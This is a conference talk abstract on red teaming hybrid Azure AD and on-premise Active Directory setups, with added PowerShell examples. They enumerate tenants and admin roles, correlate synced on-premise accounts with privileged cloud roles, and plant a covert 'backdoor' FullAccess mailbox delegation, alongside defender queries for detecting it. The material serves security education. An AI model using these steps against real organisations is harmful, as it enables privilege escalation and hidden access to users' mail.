lecture: Hybrid Cloud Seeding

Hacking Microsoft Hybrid Cloud Infrastructure

During a red team exercise, one of the prime crown jewels an attacker targets is the enterprise's Active Directory, since compromising it also opens up the enterprise applications that trust it (SharePoint, Exchange, etc.). Tools like BloodHound and PowerSploit give attackers powerful post-exploitation enumeration and a path towards compromising Active Directory. Today, however, as trust in cloud infrastructure grows, organizations are moving towards a hybrid cloud infrastructure, with Active Directory, mailboxes, SharePoint Online and similar services spread across on-premise and cloud.

In this talk, we highlight a new approach to red teaming an organization that has a hybrid cloud infrastructure (Azure hybrid cloud as recommended by Microsoft). We first cover the hybrid cloud infrastructure (Azure AD and on-premise AD) and federated services, and how they work together. We then look at the touch points (roles, groups, users, administrators) and show how to extract the required information with PowerShell from a red teamer's perspective. We then see how to visualize this information to plan the final attack on such an infrastructure. Finally, we look at pivoting strategies that can be used in such an environment.

This talk has four main parts, covering the following:

Roles and Groups in Hybrid Cloud
This section highlights where identities (users, groups, roles) interconnect between Azure AD and on-premise AD:
- Federated services
- Roles, groups and delegations for users in both environments
- Administrative groups and roles in both environments
- Object IDs in Azure AD

Enumeration of Cloud Environment
Here we demonstrate the PowerShell commands used to enumerate Azure AD, covering:
- Tenants, domains and devices
- Users and Groups
- Administrative Roles in Azure AD
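As an added example (not code from the talk), the enumeration steps above carried out with the AzureAD PowerShell module, in the order the abstract lists them. It assumes the module is installed and that the caller already holds credentials for the tenant; an ordinary member account can read most of this unless the tenant has restricted directory reads. Microsoft has since retired the AzureAD module in favour of Microsoft Graph PowerShell, where the equivalents are Get-MgOrganization, Get-MgDomain, Get-MgDevice, Get-MgUser, Get-MgGroup, Get-MgDirectoryRole and Get-MgDirectoryRoleMember.

```powershell
# Added example: enumerate an Azure AD tenant with the AzureAD module.
# Assumes the module is installed and Connect-AzureAD succeeds with the caller's credentials.
Import-Module AzureAD
Connect-AzureAD | Out-Null

# 1. Tenant, domains and devices
$tenant = Get-AzureADTenantDetail
"Tenant: $($tenant.DisplayName) ($($tenant.ObjectId))"

# AuthenticationType is the hybrid tell: Managed means the cloud verifies passwords itself
# (password hash sync or pass-through auth), Federated means AD FS on-premise does.
Get-AzureADDomain |
    Select-Object Name, IsVerified, IsDefault, AuthenticationType |
    Format-Table -AutoSize

Get-AzureADDevice -All $true |
    Select-Object DisplayName, DeviceOSType, DeviceOSVersion, DeviceTrustType |
    Format-Table -AutoSize

# 2. Users and groups. DirSyncEnabled marks objects that Azure AD Connect synced from on-prem AD.
$users = Get-AzureADUser -All $true
$users |
    Select-Object UserPrincipalName, DirSyncEnabled, AccountEnabled, UserType |
    Format-Table -AutoSize

Get-AzureADGroup -All $true |
    Select-Object DisplayName, ObjectId, DirSyncEnabled |
    Format-Table -AutoSize

# 3. Administrative roles. Get-AzureADDirectoryRole only returns roles that have been
# activated in this tenant, so a role that is absent simply has never had a member.
$privileged = foreach ($role in Get-AzureADDirectoryRole) {
    foreach ($m in Get-AzureADDirectoryRoleMember -ObjectId $role.ObjectId) {
        [pscustomobject]@{
            Role      = $role.DisplayName
            Member    = $m.DisplayName
            UPN       = $m.UserPrincipalName   # empty for service principals
            Type      = $m.ObjectType          # User or ServicePrincipal
            DirSynced = $m.DirSyncEnabled      # synced admins are the hybrid pivot point
        }
    }
}
$privileged | Sort-Object Role | Format-Table -AutoSize
```

The DirSynced column on role members is the line worth reading first: an admin role held by a synced account means the cloud privilege is reachable from whatever controls that account on-premise, which is why Microsoft recommends cloud-only accounts for administrative roles.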

Enumerating Hybrid Cloud Environment
In this section we demonstrate how to correlate Azure AD with on-premise AD:
- Azure AD domains with on-premise AD domains
- Azure AD users with on-premise AD users
- Targeting privileged Azure AD users through compromised on-premise AD users
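As an added example (not code from the talk), one way to do the user correlation and the privileged-user targeting above in PowerShell. It assumes a domain-joined host with the ActiveDirectory (RSAT) module, the AzureAD module, and an Azure AD Connect deployment using its default source anchor, so that the cloud ImmutableId is the base64 encoding of the on-premise objectGUID. A tenant that uses a different source anchor (for instance mS-DS-ConsistencyGuid) still exposes a base64 ImmutableId, but it will not match objectGUID, and the join below finds nothing.

```powershell
# Added example: join on-prem AD users to their synced Azure AD identities and flag
# which on-prem accounts hold Azure AD directory roles.
# Assumes: ActiveDirectory and AzureAD modules, and ImmutableId == base64(objectGUID).
Import-Module ActiveDirectory
Import-Module AzureAD
Connect-AzureAD | Out-Null

# Index every synced cloud user by ImmutableId so the on-prem walk is a hash lookup.
$cloudByAnchor = @{}
foreach ($u in Get-AzureADUser -All $true | Where-Object { $_.DirSyncEnabled -and $_.ImmutableId }) {
    $cloudByAnchor[$u.ImmutableId] = $u
}

# Collect which cloud object holds which directory roles.
$rolesByObjectId = @{}
foreach ($role in Get-AzureADDirectoryRole) {
    foreach ($m in Get-AzureADDirectoryRoleMember -ObjectId $role.ObjectId) {
        if (-not $rolesByObjectId.ContainsKey($m.ObjectId)) { $rolesByObjectId[$m.ObjectId] = @() }
        $rolesByObjectId[$m.ObjectId] += $role.DisplayName
    }
}

# Walk on-prem users, derive the expected ImmutableId from objectGUID and join.
$report = foreach ($adUser in Get-ADUser -Filter *) {
    $anchor = [Convert]::ToBase64String($adUser.ObjectGUID.ToByteArray())
    $cloud  = $cloudByAnchor[$anchor]
    if (-not $cloud) { continue }   # not synced: filtered OU, cloud-only counterpart, etc.
    [pscustomobject]@{
        OnPremSam  = $adUser.SamAccountName
        OnPremDN   = $adUser.DistinguishedName
        CloudUPN   = $cloud.UserPrincipalName
        CloudRoles = ($rolesByObjectId[$cloud.ObjectId] -join '; ')
    }
}

# The pivot list: on-prem accounts whose synced identity carries an Azure AD admin role.
$report | Where-Object { $_.CloudRoles } | Format-Table -AutoSize
```

Each row in the final table is an on-premise account that, if compromised (Kerberoasting, a reused password, a domain admin resetting it), yields the listed cloud role through password hash sync or federation rather than through any cloud-side weakness. The same table read from the defender's side is the list of accounts that should be cloud-only.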

Pillaging Azure Active Directory Services
Here we talk about what can be done once we have access to the Office 365 admin portal, including:
- Pwning Azure VMs
- Adding backdoor accounts
- Adding backdoor roles
- Delegating user mailbox rights
- Why detection fails
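As an added example (not code from the talk), the mailbox-delegation step listed above, followed by the two queries a defender would use to find it afterwards. It assumes the ExchangeOnlineManagement module and an account holding Exchange admin rights; victim@contoso.com and backdoor@contoso.com are placeholder identities.

```powershell
# Added example: delegate FullAccess on a mailbox, then hunt for such delegations.
# Assumes ExchangeOnlineManagement is installed and the caller is an Exchange admin.
Import-Module ExchangeOnlineManagement
Connect-ExchangeOnline -ShowBanner:$false

$target   = 'victim@contoso.com'    # placeholder
$delegate = 'backdoor@contoso.com'  # placeholder

# The delegation. -AutoMapping $false stops Outlook from auto-opening the mailbox in
# the delegate's profile, so the victim side sees no client-visible change.
Add-MailboxPermission -Identity $target -User $delegate -AccessRights FullAccess `
    -InheritanceType All -AutoMapping $false

# Hunt 1: every explicit, non-inherited FullAccess grant to someone other than the owner.
# The SELF entry and inherited entries are normal; explicit grants to other users are not.
Get-Mailbox -ResultSize Unlimited |
    Get-MailboxPermission |
    Where-Object {
        $_.AccessRights -contains 'FullAccess' -and
        -not $_.IsInherited -and
        -not $_.Deny -and
        "$($_.User)" -ne 'NT AUTHORITY\SELF'
    } |
    Select-Object Identity, User, AccessRights |
    Format-Table -AutoSize

# Hunt 2: who granted it and when, from the unified audit log. An empty result does not
# mean nothing happened: the log only holds entries if auditing was on at the time.
Search-UnifiedAuditLog -StartDate (Get-Date).AddDays(-30) -EndDate (Get-Date) `
    -Operations 'Add-MailboxPermission' -ResultSize 5000 |
    ForEach-Object { $_.AuditData | ConvertFrom-Json } |
    Select-Object CreationTime, UserId, @{ n = 'Target'; e = { $_.ObjectId } } |
    Format-Table -AutoSize
```

Hunt 1 is a point-in-time check and needs no logging; hunt 2 gives attribution but only if unified audit logging was enabled before the change, which is the usual reason detection of this step fails.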

Info

Day: 2018-09-16
Start time: 16:45
Duration: 01:00
Room: Tesla
